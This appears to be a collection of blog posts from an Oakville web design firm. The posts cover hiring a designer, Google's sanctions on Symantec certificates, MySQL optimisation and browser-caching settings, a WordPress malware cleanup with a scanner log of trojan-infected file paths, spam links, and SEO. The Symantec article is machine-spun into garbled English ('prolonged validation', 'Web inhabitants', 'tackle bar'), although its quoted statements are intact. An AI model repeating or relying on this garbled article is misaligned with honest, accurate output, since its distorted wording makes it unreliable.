Website Design in Oakville

Finding someone who does website design in Oakville who can perform it properly is very difficult. Realistically, any municipalities in the surrounding areas of Burlington, Mississauga, Port Credit, Milton, etc. can be a problem. Larger the municipalities the more so called designers are available to design your website. Almost, every one of our clients has had a “nightmare” story about a web designer gone rogue. The industry just like any other is unfortunately filled with sub par designers. You would think that the tenure/experience is a factor, however that is not the case. We have had to fix websites that have been constructed together by companies that have have been in business for well over 10 years. The purpose of this article is to try and help you choose a web designer for your business. If you follow the process below, you will hopefully find a person with proper skill to fit the bill.

Burlington, Oakville, Miton, Port Credit, Mississauga

Step 1. The Search:

First step is finding someone to do a website for you. Yellowpages (hardcover), Newspaper ads, are all tradition ways of how someone might seek out a web designer. Google Search has now become the easiest way in locating a business to do the work for you. Problem with Google Search is that you will receive both “good” and “bad” designers listed on there. How do you sift through them? One suggested method is Google Reviews. But those can be faked as well. Most effective due diligence that you can do on your part is to call a designer that you found on Google Search and tell them to provide you with the references (names and phone numbers) from the Google Reviews that they have received. This will effectively eliminate two issues: 1) They will have names/phone numbers of people who can vouch for them 2) They will prove that Google Reviews listed are not faked and that they are an ethical designing company. Your background research on the individual that you want to hire can be finalized via few telephone calls.

 

Google Search

Step 2. Retainer/Deposit:

You have found a designer that you want to build/create your website. Send all the requirements via email for your project for a detailed quote. Avoid any quotes you receive that only have one item on the quote such as “Website” and “Grand total”. Treat a quote almost as a contract of what you will be receiving once completed. All the requirements that you have requested via email should be located somewhere on the quote. Also, make sure that there is a date of completion.

Bad Quote

Realistically, you should receive a detailed quote within 2-3 business days. If it’s a price that you can work with, I suggest meeting up with the designer to put a retainer/deposit down. Deposits can vary anywhere between 10% to 60% of the entire cost. Avoid anything above 60%.

If it’s a large project, make sure to get a contract in place. The purpose of this article is to provide guidance for projects that are $10,000.00 and less. Anything higher, you should get a contract put together. For second step, I would suggest to physically meet with the designer. Those designers that have a hard time meeting up with you, I would completely avoid. Once you meet up with the designer, go over the quote and provide them with a source of payment. I would avoid cash, get a paper trail especially if it’s not a “word-of-mouth” designer referral.

Step 3. Completion:

After deposit has been put in place, next is the patience. The hope is that the designer will complete the project in time. When the project has been completed, do not pay rest of the invoice until you are happy with the outcome. If you are truly happy with the way it looks/functions, than feel free to pay the remaining amount owing.

The steps above are usually how the entire transaction should proceed. We can assure you, that we will provide you with the process above. Have a look at our Website Design section or simply Contact Us if you are interested in our services.

Google disciplines Symantec for mis-issuing 30,000 Certs

In a extreme rebuke of one of many largest suppliers of HTTPS credentials, Google Chrome builders introduced plans to drastically limit transport layer safety certificates offered by Symantec-owned issuers following the invention they’ve allegedly mis-issued greater than 30,000 certificates.

Chrome plans to cease recognizing the prolonged validation standing of all certificates issued by Symantec-owned certificates authorities, Ryan Sleevi, a software program engineer on the Google Chrome group, stated in a web-based discussion board. Prolonged validation certificates are supposed to supply enhanced assurances of a website’s authenticity by displaying the identify of the validated area identify holder within the tackle bar. Below the transfer introduced by Sleevi, Chrome will instantly cease displaying that data for a interval of no less than a 12 months. In impact, the certificates might be downgraded to less-secure domain-validated certificates.

Extra steadily, Google plans to replace Chrome to successfully nullify all at the moment legitimate certificates issued by Symantec-owned CAs. With Symantec certificates representing greater than 30 % of the Web’s legitimate certificates by quantity in 2015, the transfer has the potential to stop tens of millions of Chrome customers from with the ability to entry giant numbers of websites. What’s extra, Sleevi cited Firefox information that confirmed Symantec-issued certificates are answerable for 42 % of all certificates validations. To reduce the possibilities of disruption, Chrome will stagger the mass nullification in a approach that requires they get replaced over time. To do that, Chrome will steadily lower the “most age” of Symantec-issued certificates over a collection of releases. Chrome 59 will restrict the expiration to not more than 33 months after they had been issued. By Chrome 64, validity could be restricted to 9 months.

Announcement is just the most recent growth in Google’s 18-month critique of practices by Symantec issuers. In October 2015, Symantec fired an undisclosed variety of workers answerable for issuing check certificates for third-party domains with out the permission of the area holders. One of many extended-validation certificates coated google.com and www.google.com and would have given the particular person possessing it the flexibility to cryptographically impersonate these two addresses. A month later, Google pressured Symantec into performing a expensive audit of its certificates issuance course of after discovering the mis-issuances went nicely past what Symantec had first revealed.

In January 2017, an unbiased safety researcher unearthed proof that Symantec improperly issued 108 new certificates. Thursday’s announcement got here after Google’s investigation revealed that over a span of years, Symantec CAs have improperly issued greater than 30,000 certificates. Such mis-issued certificates symbolize a probably important menace to nearly all the Web inhabitants as a result of they make it attainable for the holders to cryptographically impersonate the affected websites and monitor communications despatched to and from the legit servers. They’re a serious violation of the so-called baseline necessities that main browser makers impose of CAs as a situation of being trusted by main browsers.

Mr. Sleevi wrote:

As captured in Chrome’s Root Certificate Policy, root certificate authorities are expected to perform a number of critical functions commensurate with the trust granted to them. This includes properly ensuring that domain control validation is performed for server certificates, to audit logs frequently for evidence of unauthorized issuance, and to protect their infrastructure in order to minimize the ability for the issuance of fraudulent certs.
On the basis of the details publicly provided by Symantec, we do not believe that they have properly upheld these principles, and as such, have created significant risk for Google Chrome users. Symantec allowed at least four parties access to their infrastructure in a way to cause certificate issuance, did not sufficiently oversee these capabilities as required and expected, and when presented with evidence of these organizations’ failure to abide to the appropriate standard of care, failed to disclose such information in a timely manner or to identify the significance of the issues reported to them.

These issues, and the corresponding failure of appropriate oversight, spanned a period of several years, and were trivially identifiable from the information publicly available or that Symantec shared.

The full disclosure of these issues has taken more than a month. Symantec has failed to provide timely updates to the community regarding these issues. Despite having knowledge of these issues, Symantec has repeatedly failed to proactively disclose them. Further, even after issues have become public, Symantec failed to provide the information that the community required to assess the significance of these issues until they had been specifically questioned. The proposed remediation steps offered by Symantec have involved relying on known-problematic information or using practices insufficient to provide the level of assurance required under the Baseline Requirements and expected by the Chrome Root CA Policy.

Symantec officials released an email statement:

As the world’s leading cyber security company and the market leading Certificate Authority, we understand the importance of the trust chain we provide for our customers and everyone who uses the Internet. We learned of Google’s proposal when they posted it on their blog today. Their communication was unexpected and their proposed action is irresponsible. Our SSL/TLS certificate customers and partners need to know that this does not require any action at this time.

Symantec’s repeated violations underscore one of many issues Google and others have in imposing phrases of the baseline necessities. When violations are carried out by issuers with a sufficiently big market share they’re thought-about too huge to fail. If Google had been to nullify all the Symantec-issued certificates in a single day, it would trigger widespread outages. The penalties outlined by Sleevi appear to be aimed toward minimizing such disruptions whereas nonetheless exacting a significant punishment.

The penalties instantly revoke solely the standing of prolonged validation certificates issued by Symantec, a transfer that’s more likely to be a serious annoyance to many Symantec prospects and their web site guests, however not make websites unavailable. The untrusting of all Symantec certificates, in the meantime, has a a lot increased potential of making Web-wide issues.

As Sleevi defined it: “By phasing such adjustments in over a collection of releases, we goal to attenuate the affect any given launch poses, whereas nonetheless frequently making progress in the direction of restoring the mandatory degree of safety to make sure Symantec-issued certificates are as reliable as certificates from different CAs.”

Update: Symantec has released additional information on their Blog.

Our customers don’t have to worry about the SSL issues you see above. We have always used Comodo SSL certificates.

Run OPTIMIZE TABLE to defragment tables for better performance

If you are noticing slugging performance wits your MySQL database, this simple tutorial is for you. This is particularly important for websites that have a large MySQL database. Please note that you must have root access and SSH access to proceed further. Log into your web hosting via SSH and follow below.

Run this command:

Code:

mysqlcheck -u root –auto-repair –optimize –all-databases

If you notice issues you can fix tables by issuing:

Code:

mysqlcheck -A -r -p

If everything has been fixed it is highly recommended to restart your MySQL server:

/etc/init.d/mysql restart

That is all, you should see increase in your MySQL queries and of course better performance.

How to leverage browser caching

What is browser caching?

Every time a browser loads a webpage it has to download all the web files to properly display the page. This includes all the HTML, CSS, JavaScript and images.

Some pages might only consist of a few files and be small in size – maybe a couple of kilobytes. For others however there may be a lot of files, and these may add up to be several megabytes large. Twitter.com for example is 3 MB+.

The issue is two fold.

These large files take longer to load and can be especially painful if you’re on a slow internet connection (or a mobile device). Each file makes a separate request to the server. The more requests your server gets simultaneously the more work it needs to do, only further reducing your page speed.

Browser caching can help by storing some of these files locally in the user’s browser. Their first visit to your site will take the same time to load, however when that user revisits your website, refreshes the page, or even moves to a different page of your site, they already have some of the files they need locally.

This means the amount of data the user’s browser has to download is less, and fewer requests need to be made to your server. The result? Decreased page load times.

Here’s something you can add to your apache htaccess file and see if it improves loading times for you:

 

##EXPIRES CACHING
ExpiresActive On
ExpiresByType image/jpg “access 1 month”
ExpiresByType image/jpeg “access 1 month”
ExpiresByType image/gif “access 1 month”
ExpiresByType image/png “access 1 month”
ExpiresByType text/css “access 1 month”
ExpiresByType application/pdf “access 1 month”
ExpiresByType text/x-javascript “access 1 month”
ExpiresByType application/javascript “access 1 month”
ExpiresByType image/x-icon “access 1 year”
ExpiresDefault “access 1 week”
##EXPIRES CACHING

Let us know what you think?

EDIT: Its actually ##EXPIRES CACHING no need to have # after caching.

WordPress Malware (PHP.Trojan.Uploader & Php.Trojan.StopPost)

WordPress as a platform is fantastic, and usually its a fairly secure. However, plugins that you use might be a different story. Some plugins are updated on weekly basis, and then there are those that are updated monthly, annually or sometimes are never updated again.

One of our clients runs a very active and informational website. The client had refused to do any updates because they were afraid that it might “break” something on their website. Which is totally understandable. For those of you who do updates on daily basis, sometimes its not a smooth progression and you spend more time troubleshooting the issue than anything else.

Client was hosted on a shared web server, and our firewall had alerted us that the website had been sending a large amount of SPAM. Approximately 200-300 emails per minute. We had immediately disabled the website and had ran a scan on the entire server.

As it turns out their website had been compromised via plugin and had injected itself authorizing use of the server’s mail resources. Upon further investigation the server had not been compromised just the clients website.

Here’s the complete log of what had been infected:

{CAV}PHP.Trojan.Uploader : /home/user/web/website.com/public_htmlx/wp-includes/ID3/header.php.suspected
{CAV}PHP.Trojan.Uploader : /home/user/web/website.com/public_htmlx/wp-includes/images/smilies/options.php.suspected
{HEX}php.base64.v23au.184 : /home/user/web/website.com/public_htmlx/wp-includes/images/wlw/object.php
{CAV}PHP.Trojan.Uploader : /home/user/web/website.com/public_htmlx/wp-content/themes/twentyfourteen/inc/inc.php.suspected
{CAV}Php.Trojan.StopPost : /home/user/web/website.com/public_htmlx/wp-content/uploads/2015/ajax.php.suspected
{HEX}php.cmdshell.unclassed.358 : /home/user/web/website.com/public_htmlx/wp-content/uploads/phpini.php
{CAV}Php.Trojan.StopPost : /home/user/web/website.com/public_htmlx/wp-content/plugins/tinymce-advanced/css/test.php.suspected
{CAV}PHP.Trojan.Uploader : /home/user/web/website.com/public_htmlx/wp-content/plugins/eventON/assets/js/javascript.php.suspected
{CAV}PHP.Trojan.Uploader : /home/user/web/website.com/public_htmlx/wp-content/plugins/eventON/assets/css/test.php.suspected
{CAV}Php.Trojan.StopPost : /home/user/web/website.com/public_htmlx/wp-content/plugins/display-widgets/session.php.suspected
{CAV}Php.Trojan.StopPost : /home/user/web/website.com/public_htmlx/wp-content/plugins/shortcodes-ultimate/inc/core/general.php.suspected
{CAV}Php.Trojan.StopPost : /home/user/web/website.com/public_htmlx/wp-content/plugins/shortcodes-ultimate/assets/images/player/view.php.suspected
{CAV}PHP.Trojan.Uploader : /home/user/web/website.com/public_htmlx/wp-content/plugins/business-directory-plugin/vendors/anet_php_sdk/lib/ssl/include.php
{CAV}PHP.Trojan.Uploader : /home/user/web/website.com/public_htmlx/wp-content/plugins/business-directory/business-directory-plugin/vendors/anet_php_sdk/tests/AuthorizeNetDPM_Test.php
{CAV}PHP.Trojan.Uploader : /home/user/web/website.com/public_htmlx/wp-content/plugins/wordpress-seo/model.php.suspected
{CAV}Php.Trojan.StopPost : /home/user/web/website.com/public_htmlx/wp-content/plugins/wordpress-seo/vendor/yoast/api-libs/google/service/Google_BatchRequest.php
{CAV}Php.Trojan.StopPost : /home/user/web/website.com/public_htmlx/wp-content/plugins/wordpress-seo/vendor/yoast/api-libs/class-api-libs.php
{CAV}Php.Trojan.StopPost : /home/user/web/website.com/public_htmlx/wp-content/plugins/wordpress-seo/vendor/yoast/license-manager/samples/sample-theme-functions.php
{CAV}PHP.Trojan.Uploader : /home/user/web/website.com/public_htmlx/wp-content/plugins/stop-auto-update/dump.php.suspected
{CAV}Php.Trojan.StopPost : /home/user/web/website.com/public_htmlx/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/search.php.suspected
{CAV}PHP.Trojan.Uploader : /home/user/web/website.com/public_htmlx/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/validation/object.php
{CAV}Php.Trojan.StopPost : /home/user/web/website.com/public_htmlx/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/ajax/static/css.php
{CAV}Php.Trojan.StopPost : /home/user/web/website.com/public_htmlx/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/nextgen_basic_album/module.nextgen_basic_album.php
{CAV}PHP.Trojan.Uploader : /home/user/web/website.com/public_htmlx/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/nextgen_pagination/view.php
{CAV}PHP.Trojan.Uploader : /home/user/web/website.com/public_htmlx/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/fs/package.module.fs.php
{CAV}PHP.Trojan.Uploader : /home/user/web/website.com/public_htmlx/wp-content/plugins/seo-image/javascripts/css.php.suspected
{CAV}Php.Trojan.StopPost : /home/user/web/website.com/public_htmlx/wp-content/gallery/gal1/thumbs/ajax.php.suspected

Unfortunately, the best we could do is restore from previous backup and perform a plugin update along with wordpress.

Moral of the story is, update your plugins people. And if the plugin is old, we wouldn’t recommend using it.

Spam Links showing up in WordPress

I was contacted by a client who had experienced odd links / advertisements showing up in his WordPress setup. Furthermore, he had experienced emails bouncing back from his Contact Us form. The client has a dedicated servers with 5 ip addresses. Other websites are not experiencing any issues nor are the other 4 ip addresses. The odds are his entire server was not compromised.

Upon examining his infected website it appeared that majority of the links traced back to: http://www.genericstts.com. Some of the keywords that were used in linkage were: Play Craps Online, Play Bingo Online, and Meilleurs Casino en ligne.

This was a multiple task, first we needed to find out why his dedicated server was blacklisted and second, we needed to find out what was causing these links / advertisements.

There was absolutely no point in trying to un-blacklist his ip address because we needed to solve his website spam problem.

The obvious solution was to find if its a plugin or theme causing this or the actual WordPress that was compromised. After narrowing it down, it appeared that a plugin was compromised.

This is where you need to make a decision. Do you just wipe the entire system or delete just the plugin or trace the issue and try to eliminate the malware manually and keep the plugin and the website in tact. It all depends how much information you have stored in your wordpress setup, how much time you want to spend, or how much money you want to spend for someone to spend the time to narrow down the problem. The client wanted to trace the issue down. According to Fox IT, the proper solution should be to eliminate the user and to wipe the system down.

Now you can try and install clamav or maldet to see if it will find the malware and remove it for you, or you can try to find the issue manually.

I did it manually, since I knew which plugin was infected I took a look at each file manually. As it turns out it was a .PNG file that was infected. It did drop itself in two different spots. After getting rid of the two .PNG files, I also made sure you couldn’t write into those two directories.

After getting rid of the malware, I went to de-list the blacklisted IP.

All was back to normal.

If you require any sort of malware removal on your dedicated server (or shared) CONTACT US

 

Web Search Results Required

Clients have approached me on a countless occasion requiring web search results over the actual web design/development. Web site owners rather keep their out dated content, old layout, old infrastructure, old coding and expect a Search Engine Optimization to place them number 1 on Google search index.

The problem with that assumption is that Google updates its search engine index algorithm monthly if not weekly (possibly daily). The algorithm is constantly evolving and including the latest technologies, trends and social data gathering. More importantly, Google’s main search prerogative is the actual content/information. In simple terms, if your content is 5 years old, and you spend your budget on Search Engine Optimization (SEO), it won’t be significant enough for Google to care.

CONTENT IS KEY

PRO TIP: Before attacking SEO, consider changing and or updating your websites content. Google likes updated content, coding, and technology.